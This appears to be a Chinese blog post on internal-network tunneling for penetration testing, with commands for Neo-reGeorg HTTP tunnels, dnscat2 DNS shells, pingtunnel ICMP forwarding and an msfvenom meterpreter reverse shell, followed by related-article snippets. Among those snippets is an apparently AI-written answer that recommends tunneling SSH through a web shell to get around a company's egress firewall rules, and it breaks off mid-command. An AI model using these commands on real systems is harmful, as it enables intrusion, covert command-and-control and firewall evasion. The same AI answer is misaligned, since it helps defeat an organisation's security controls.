HTTP-DNS-ICMP代理隧道

原创 于 2025-07-03 14:51:49 发布 · 887 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#http #网络协议 #网络 #代理隧道

HTTP代理隧道

环境

kail虚拟机:桥接模式,(IP地址:192.168.1.5),主要用作外围机 win10虚拟机:桥接模式(IP地址:192.168.1.6)nat模式(IP地址:192.168.126.138)其主要用作边界服务器 windows server:nat模式(IP地址:192.168.126.131)其主要做内网服务器

Neo-reGeorg
#查看可选参数
python3 neoreg.py -h

1.设置密码生成tunnel.(aspx|ashx|jsp|jspx|php)并上传到WEB服务器

python3 neoreg.py generate -k passwd

2.下载tunnel脚本到目标WEB服务

wget http://XX.XX.XX.XX:XX/8000jsp

3.使用neoreg.py连接WEB服务器,在本地建立socks代理,代理默认端口1080

python3 neoreg.py -k passwd -u http://XX.XX.XX.XX:XX/脚本下载的地址/tunnel.jsp

4.执行完成会返回对应代理配置在浏览器设置代理直接就能访问内网了。

DNS代理隧道
直连

1 先在攻击机kali上开启服务

#进入 ~/dnscat2/server,输入命令开启服务
ruby dnscat2.rb

2 对于windows系统需要执行dnscat2.exe

#secret等于的值为开启服务生成的值
dnscat2.exe --dns server=192.168.80.135,port=53 --secret=7a7192afe8930a665e19532716f487d8

3 进入交互

session -i 1

4 生成shell窗口

shell

5 进行交互

session -i 2

  • 直连流量特征

Dnscat2中继模式

DNS解析先经过互联网的迭代解析,最后指向我们的恶意DNS服务器。相比直连慢,但是安全。

ICMP隧道

通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,

tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有

icmp 协议可以出网。

ICMP隧道转发TCP上线MSF

1 VPS启动ICMP隧道服务端 192.168.80.135,icmp服务端和msf服务都在此VPS上

./pingtunnel -type server

2 靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.80.135
-t 192.168.80.135:7777 -tcp 1 -noprint 1 -nolog 1

icmp 客户端监听 127.0.0.1:9999 ,通过连接到 192.168.80.135 的 icmp 隧道,将 127.0.0.1:9999 收到的 tcp 数据包转发到 192.168.80.135:7777

3 MSF 生成反弹 shell 的 payload 上传到靶机

msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=127.0.0.1 lport=9999 -f exe > 9999.exe

4 执行 payload 反弹 shell 到 MSF

内网隧道代理技术(二十六)之 搭建ICMP隧道上线CS
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-15 650
ICMP隧道简单实用,是一个比较特殊的协议。在一般的里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。
ICMP 隧道技术 - pingtunnel
shawdow_bug的博客
09-13 469
ICMP 隧道工具 pingtunnel
内网渗透系列:内网隧道之pingtunnel
闵行小鱼塘
04-10 2347
本文研究ICMP隧道的一个工具,pingtunnel
icmp 流量抓取 转发 代理(2)
weixin_30628801的博客
09-17 367
客户端C到服务器S的icmp包经过本机P时被截获,在上一篇中已经介绍了如何获取原始目的地址,你必须将数据转发到原始目的地址S,并且在收到从原始目的地址的响应之后转发给客户端。此时,要实现透明代理,则你返回给客户端的icmp响应的源地址必须为客户端请求的原始目的地址S。由于使用的是raw socket,无法用IP_TRANSPARENT的socket选项绑定非本机地址的方法(bind会报错...
网络DNS | ICMP | NAT | 代理服务器
weixin_63726869的博客
08-23 2048
介绍了网络中的一些重要协议和技术,包括DNS(域名解析),ICMP协议,NAT技术,以及代理服务器的概念。
计算机网络DNSICMP协议、NAT&NAPT、代理
m0_63020222的博客
12-17 1024
计算机网络DNSICMP协议、NAT&NAPT、代理
内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac 简单总结
qq_43583125的博客
05-07 1299
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */iptables -L /* 显示iptables列表 */
DAY173内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
m0_74402888的博客
12-28 992
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。2、隧道技术篇-传输层-DNS协议-判断&封装&建立&穿透(可上线C2但不支持搭建socks代理)1、隧道技术篇-网络-ICMP协议-判断&封装&建立&穿透(可上线C2并搭建socks代理)3、隧道技术篇-表示层-SMB协议-判断&封装&建立&穿透(需要口令横向移动上线C2)
隧道技术和代理技术(四)SSH&DNS&ICMP&SMB&上线通讯
qq_74806534的博客
03-25 1454
接下来配置监听器,具体含义是解析的域名是ns1.swq111.online/ns2.swq111.online,解析到cs.swq111.online,然后还原到ip地址。可以看上面的图片,外网服务器和内网靶机之间有一个只允许DNS通讯的防火墙,一般情况下只能外网访问外网,外网不能访问内网,如果在此之间配置两个虚拟网卡,就能完成通讯。因为防火墙只让ssh协议通过,所有使用linux做跳板机,来将windous的web服务,通过ssh协议转发到外网服务器,实现内网探针。
第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
qq_46081990的博客
08-02 2354
拓扑图:在前一次的基础上,win2008做了入站限制(只让访问Web服务),win2012也做了入站限制(只让访问打印机)思路:win7还是有外网出口的,正向tcp/反向tcp都能直接拿下;拿下win7后,生成正向tcp,让win7主动连接拿下win10(也可以反向,但需要在win7的11网卡上设置监听器,转发上线win10);
DNS隧道+FRP隧道
snowman12138的博客
03-02 2638
DNS隧道,是隧道技术的一种。当我们HTTPHTTPS这样的上层协议、正反向端口转发都失败的时候,可以尝试DNS隧道DNS隧道很难防范,因为平时的业务等功能难免会用到DNS协议进行解析,所以防火墙大多对DNS流量是放行的状态。这时候,如果我们在不出机器构造一个恶意的域名,本地DNS服务器无法给出回答时,就会以迭代查询的方式通过互联网定位到所查询域的权威DNS服务器。最后,这条DNS请求会落到我们提前搭建好的恶意DNS服务器上,于是乎,我们的不出网主机就和恶意DNS服务器交流上了。
DNSICMP、NAT以及代理服务器
m0_62229058的博客
05-02 1666
域名是用来识别主机名称和主机所属的组织机构的一种分层结构的名称。如 www.xxx.com,域名使用 . 连接:www: 是一种习惯用法 (可以省略 ),之前人们在使用域名时,往往命名成类似于 ftp.xxx.xxx / www.xxx.xxx 这样的格式,来表示主机支持的协议;xxx: 二级域名,一般是公司或者组织的名称;com:一级域名,表示这是一个企业域名,同级的还有 "net" (网络提供商)、"org" (非营利组织)、"edu" (教育机构) 等等。
ARP代理ICMP重定向
cuc_xiaolingdan的博客
09-03 1094
ARP 地址解析协议:根据IP地址获取物理地址 ARP过程:将ARP请求广播到网络上所有主机,接收返回消息,并将该IP地址和物 理地址存入本机ARP缓存且保留一定时间 无故ARP:用自己的IP地址为目的IP地址,发送ARP请求 目的是检查地址重复、通告新的数据链路标识(默认关闭) ARP代理 路由器收到ARP请求并且有前往目标IP的路由条目,进行ARP代理,把接收该ARP 请求的接
一文读懂DNS隧道
FreeBuf_的博客
12-02 4745
此篇文章为了读者看起来更加清楚,公网服务器与域名都是未打码的,希望各位大佬手下留情。
Linux:(DNSICMP,ping,NAT,代理服务器)
weixin_70067429的博客
04-04 1006
运营商服务器接收到服务器发来的数据。路由器在映射表中查找,发现这个数据的四元组信息能找到对应元素。此时,运营商路由器就将公网中的四元组替换为局域网中的四元组,再次进行发送。此时,在局域网中,四元组的唯一性被保证,家用服务器也能接收到数据。路由器通常情况下都带有NAT功能,否则无法完成内网和公网的IP地址转换问题,四元组的映射关系转换表也是由路由器自动维护的。假设使用TCP协议,当连接建立时,路由器中就会生成这对通信双方的映射表项,断开连接后也会删除这个表项。
【Linux网络编程】DNSICMP、NAT技术、代理服务器+网络通信各层协议总结
fight_p的博客
05-01 1735
前面文章已经把网络通信用到的主要协议都说过了,这篇文章是网络通信整个拓扑结构细节的的补充,其中我们重点就是在NAT技术、代理服务器,NAT在IP我们简单了解直到它在路由器上是做源IP和WAN口IP的转换,那发出现的问题解决了,服务器给响应如何返回呢?经过学习我们直到服务器给我们维护了一张NAT转换表,这个表是KV结构,IP+port一起保证了从左到右,从右到左转换的唯一性,因此就可以正确返回主机。代理服务器看着和NAT类似,其实它们不是一个东西,代理服务器分正向代理和反向代理。最后总结整个网络通信协议。
【内网学习笔记】6、ICMP隧道工具使用
TeamsSix 的 优快云 空间
04-07 848
1、介绍 在内网中,如果攻击者使用 HTTPDNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpsh、icmptunnel 等 ptunnel ptunnel 全称 PingTunnel,Kali
dns隧道攻击原理及常用工具流量分析
Fiverya的博客
02-20 4574
今天看到一个关于Lyceum组织的文章,这个组织擅长使用dns隧道攻击,这种攻击方式还是头一次听说,于是搜集了一些文章来看看。
内网渗透之DNS隧道搭建
蚁景网安学院
08-26 1253
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 本文作者:D1m0n 前言 年初有幸参加了一次hvv,我主要负责内网渗透的部分,包括代理搭建,横向移动等等。那个时候,也是刚刚接触内网没两个月,赶鸭子上架的学了一下就上了战场。好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都.
graph TB A[ZStack私有云平台] --> B[安全组策略] B --> C[禁止非80/443端口出站] B --> D[关键服务器禁止ICMP] B --> E[业务服务器DNS白名单] 运行结果为----------------------------------------- 127.0.0.1 ▽ ----------------------------------------- 连接超时!请检查主机是否已启动,网络是否可访问。错误域=SSHManager代码=1“未找到SSH连接”用户信息={NSLocalizedDescription=未找到SSH连接}
最新发布
06-18
<think>我们正在排查ZStack私有云平台中SSH连接失败的问题,用户提到错误代码1,并且环境中有安全组策略限制:禁止非80/443端口出站,关键服务器禁止ICMP,业务服务器DNS白名单。这些策略可能导致SSH连接失败,因为SSH默认使用22端口,而安全组可能阻止了该端口的出站或入站。分析:1.SSH连接超时错误代码1通常表示连接被拒绝或无法建立,可能是网络策略阻止。2.安全组策略禁止非80/443端口出站:这意味着从内部服务器主动发起的SSH连接(使用22端口)会被阻止,因为22端口不在允许的出站端口(80/443)中。3.关键服务器禁止ICMP:这可能导致无法通过ping测试网络连通性,但不会直接影响SSH连接(除非依赖ICMP的底层网络检查)。4.业务服务器DNS白名单:如果SSH连接需要解析域名,而DNS服务器不在白名单中,则无法解析域名,导致SSH连接失败(如果使用域名连接)。解决思路:1.检查安全组规则:确保允许SSH流量的入站和出站。SSH需要22端口的入站(目标服务器)和出站(客户端)允许。2.由于安全组禁止非80/443端口出站,我们需要调整策略以允许22端口的出站(如果客户端在云平台内)或者考虑使用其他方法(如通过80/443端口进行SSH隧道,因为这两个端口是允许出站的)。3.如果无法修改安全组规则,可以考虑将SSH服务端口改为80或443(但这可能与现有Web服务冲突),或者使用端口转发。具体步骤:###一、检查安全组规则在ZStack私有云平台中,检查涉及的安全组:1.登录ZStack管理界面。2.找到目标虚拟机所属的安全组,检查入站规则(Ingress)和出站规则(Egress)。3.确认是否有针对SSH(22端口)的允许规则,如果没有,需要添加。注意:安全组规则需要同时考虑源和目的。例如:-入站规则:允许源IP(或CIDR)访问目标端口22(TCP)。-出站规则:允许目标端口22(TCP)的出站流量(如果客户端在云平台内,从虚拟机发起SSH到外部需要此规则)。但是,用户环境有特殊策略:禁止非80/443端口出站。这意味着即使添加了22端口的入站规则,虚拟机也无法通过22端口主动向外发起连接(例如连接到外部跳板机)。如果是外部连接虚拟机,则只需要入站规则允许22端口,而出站响应通常会被自动允许(状态化防火墙)。因此,问题可能出现在:-外部连接虚拟机:如果安全组入站规则没有允许22端口,则连接会被拒绝。-虚拟机主动向外发起SSH连接:由于出站规则禁止非80/443端口,所以连接会失败。###二、调整安全组规则(推荐)1.**入站规则**:添加一条允许源IP(或范围)访问22端口的规则。2.**出站规则**:如果虚拟机需要主动连接外部的SSH服务器(22端口),则需要添加一条允许目标端口22的出站规则。但是,由于策略禁止非80/443端口出站,这可能需要例外审批。如果无法添加22端口的出站规则,可以考虑以下替代方案:###三、使用HTTP/HTTPS隧道进行SSH(绕过端口限制)由于出站允许80/443端口,我们可以将SSH流量封装在HTTP/HTTPS协议中。方法:1.在目标虚拟机(需要SSH访问的机器)上部署一个HTTP隧道服务端(如reGeorg)。2.在本地攻击机(或跳板机)上使用隧道客户端,通过HTTP/HTTPS端口与虚拟机建立隧道。3.通过隧道进行SSH连接。步骤示例:-在虚拟机上上传reGeorg的tunnel脚本(如tunnel.jsp或tunnel.php)。-在本地运行:```bashpythonreGeorgSocksProxy.py-uhttp://虚拟机IP/tunnel.jsp-p1080```这将在本地1080端口创建一个SOCKS代理-使用SSH通过SOCKS代理连接:```bashssh-oProxyCommand='nc-x
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值